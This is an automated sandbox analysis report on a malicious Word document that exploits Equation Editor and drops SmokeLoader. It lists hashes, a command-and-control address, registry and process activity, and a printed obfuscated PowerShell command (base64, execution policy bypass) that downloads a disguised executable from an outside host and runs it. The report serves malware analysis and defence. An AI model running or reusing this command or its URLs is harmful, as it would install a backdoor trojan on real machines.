Analysis
-
max time kernel
100s -
max time network
102s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
13-04-2021 05:42
Static task
static1
Behavioral task
behavioral1
Sample
2021lk049459.doc
Resource
win7v20210410
Behavioral task
behavioral2
Sample
2021lk049459.doc
Resource
win10v20210408
General
-
Target
2021lk049459.doc
-
Size
2.2MB
-
MD5
40f9df41effa8762858974452db083d9
-
SHA1
fd382c2ae4ad3545b5d198d8c51735045584f8ce
-
SHA256
06b686985f4246819d7fed52a2b9fc1dbed7406d80f902d655866aed61392cbd
-
SHA512
f09b0b5415ac3f1c9af5f13774bb01675540a3238ac23301b404f13fb847f62725e7ad03f7de7b0fbecf19c90ee2be53b5e7b09aada12780f7685258b54f58f2
Malware Config
Extracted
https://u.teknik.io/bHrgG.jpg
Extracted
smokeloader
2018
http://94.140.114.59/1/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 4 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 6 1368 EQNEDT32.EXE 8 1368 EQNEDT32.EXE 10 1368 EQNEDT32.EXE 11 1752 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
69577.exenTvWNOa.exepid process 296 69577.exe 1228 nTvWNOa.exe -
Loads dropped DLL 3 IoCs
Processes:
EQNEDT32.EXEpowershell.exepid process 1368 EQNEDT32.EXE 1752 powershell.exe 1752 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
nTvWNOa.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum nTvWNOa.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 nTvWNOa.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 768 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 640 powershell.exe 640 powershell.exe 1752 powershell.exe 1752 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
nTvWNOa.exepid process 1228 nTvWNOa.exe 1228 nTvWNOa.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 640 powershell.exe Token: SeDebugPrivilege 1752 powershell.exe -
Suspicious use of FindShellTrayWindow 11 IoCs
Processes:
69577.exepid process 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe -
Suspicious use of SendNotifyMessage 11 IoCs
Processes:
69577.exepid process 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe 296 69577.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 768 WINWORD.EXE 768 WINWORD.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WINWORD.EXEEQNEDT32.EXE69577.exepowershell.exepowershell.exedescription pid process target process PID 768 wrote to memory of 852 768 WINWORD.EXE splwow64.exe PID 768 wrote to memory of 852 768 WINWORD.EXE splwow64.exe PID 768 wrote to memory of 852 768 WINWORD.EXE splwow64.exe PID 768 wrote to memory of 852 768 WINWORD.EXE splwow64.exe PID 1368 wrote to memory of 296 1368 EQNEDT32.EXE 69577.exe PID 1368 wrote to memory of 296 1368 EQNEDT32.EXE 69577.exe PID 1368 wrote to memory of 296 1368 EQNEDT32.EXE 69577.exe PID 1368 wrote to memory of 296 1368 EQNEDT32.EXE 69577.exe PID 296 wrote to memory of 640 296 69577.exe powershell.exe PID 296 wrote to memory of 640 296 69577.exe powershell.exe PID 296 wrote to memory of 640 296 69577.exe powershell.exe PID 296 wrote to memory of 640 296 69577.exe powershell.exe PID 640 wrote to memory of 1752 640 powershell.exe powershell.exe PID 640 wrote to memory of 1752 640 powershell.exe powershell.exe PID 640 wrote to memory of 1752 640 powershell.exe powershell.exe PID 640 wrote to memory of 1752 640 powershell.exe powershell.exe PID 1752 wrote to memory of 1228 1752 powershell.exe nTvWNOa.exe PID 1752 wrote to memory of 1228 1752 powershell.exe nTvWNOa.exe PID 1752 wrote to memory of 1228 1752 powershell.exe nTvWNOa.exe PID 1752 wrote to memory of 1228 1752 powershell.exe nTvWNOa.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2021lk049459.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\69577.exe"C:\Users\Public\69577.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"5⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exeMD5
3cf58ec9de521b32015552ca3024d1cd
SHA1539236ecd9d859f82f89311bfd564906aa98451e
SHA256ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace
SHA51225d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
8ae81224c95faf7008d0f5778a8badf0
SHA12e4930dddf0bb31c9bf139181029f83c0d4e65c5
SHA256a425f2b734ab7b2ee6d417299a38958f3b63c558c8fb29d0b4bb34a1d0458922
SHA512b7c34aa6d4ed0c16f61beeee5e3ddc5d58e5fb61085d76cc60c2ac09e8601209ca43c1e029e901f003764cd1f6c665010b9e3cedfadc533c873613a0330ade23
-
C:\Users\Public\69577.exeMD5
2c2cb2aa0782874d3c14cdd6f063f979
SHA1583c43ca939f9d8a4eea53a7d71157ac3571a350
SHA256c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da
SHA51234c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26
-
C:\Users\Public\69577.exeMD5
2c2cb2aa0782874d3c14cdd6f063f979
SHA1583c43ca939f9d8a4eea53a7d71157ac3571a350
SHA256c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da
SHA51234c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26
-
\Users\Admin\AppData\Local\Temp\nTvWNOa.exeMD5
3cf58ec9de521b32015552ca3024d1cd
SHA1539236ecd9d859f82f89311bfd564906aa98451e
SHA256ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace
SHA51225d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599
-
\Users\Admin\AppData\Local\Temp\nTvWNOa.exeMD5
3cf58ec9de521b32015552ca3024d1cd
SHA1539236ecd9d859f82f89311bfd564906aa98451e
SHA256ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace
SHA51225d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599
-
\Users\Public\69577.exeMD5
2c2cb2aa0782874d3c14cdd6f063f979
SHA1583c43ca939f9d8a4eea53a7d71157ac3571a350
SHA256c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da
SHA51234c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26
-
memory/296-66-0x0000000000000000-mapping.dmp
-
memory/640-77-0x0000000004850000-0x0000000004851000-memory.dmpFilesize
4KB
-
memory/640-70-0x0000000000000000-mapping.dmp
-
memory/640-72-0x0000000000940000-0x0000000000941000-memory.dmpFilesize
4KB
-
memory/640-73-0x0000000004930000-0x0000000004931000-memory.dmpFilesize
4KB
-
memory/640-74-0x00000000048F0000-0x00000000048F1000-memory.dmpFilesize
4KB
-
memory/640-75-0x00000000048F2000-0x00000000048F3000-memory.dmpFilesize
4KB
-
memory/640-76-0x0000000002420000-0x0000000002421000-memory.dmpFilesize
4KB
-
memory/768-61-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/768-59-0x0000000072C81000-0x0000000072C84000-memory.dmpFilesize
12KB
-
memory/768-112-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/768-60-0x0000000070701000-0x0000000070703000-memory.dmpFilesize
8KB
-
memory/852-62-0x0000000000000000-mapping.dmp
-
memory/852-63-0x000007FEFC181000-0x000007FEFC183000-memory.dmpFilesize
8KB
-
memory/1228-107-0x0000000000000000-mapping.dmp
-
memory/1288-110-0x0000000002200000-0x0000000002201000-memory.dmpFilesize
4KB
-
memory/1288-111-0x00000000021E0000-0x00000000021F5000-memory.dmpFilesize
84KB
-
memory/1368-64-0x0000000075EF1000-0x0000000075EF3000-memory.dmpFilesize
8KB
-
memory/1752-104-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1752-85-0x00000000048E2000-0x00000000048E3000-memory.dmpFilesize
4KB
-
memory/1752-103-0x0000000006400000-0x0000000006401000-memory.dmpFilesize
4KB
-
memory/1752-102-0x00000000062E0000-0x00000000062E1000-memory.dmpFilesize
4KB
-
memory/1752-84-0x00000000048E0000-0x00000000048E1000-memory.dmpFilesize
4KB
-
memory/1752-95-0x00000000061E0000-0x00000000061E1000-memory.dmpFilesize
4KB
-
memory/1752-94-0x00000000057F0000-0x00000000057F1000-memory.dmpFilesize
4KB
-
memory/1752-89-0x00000000056B0000-0x00000000056B1000-memory.dmpFilesize
4KB
-
memory/1752-78-0x0000000000000000-mapping.dmp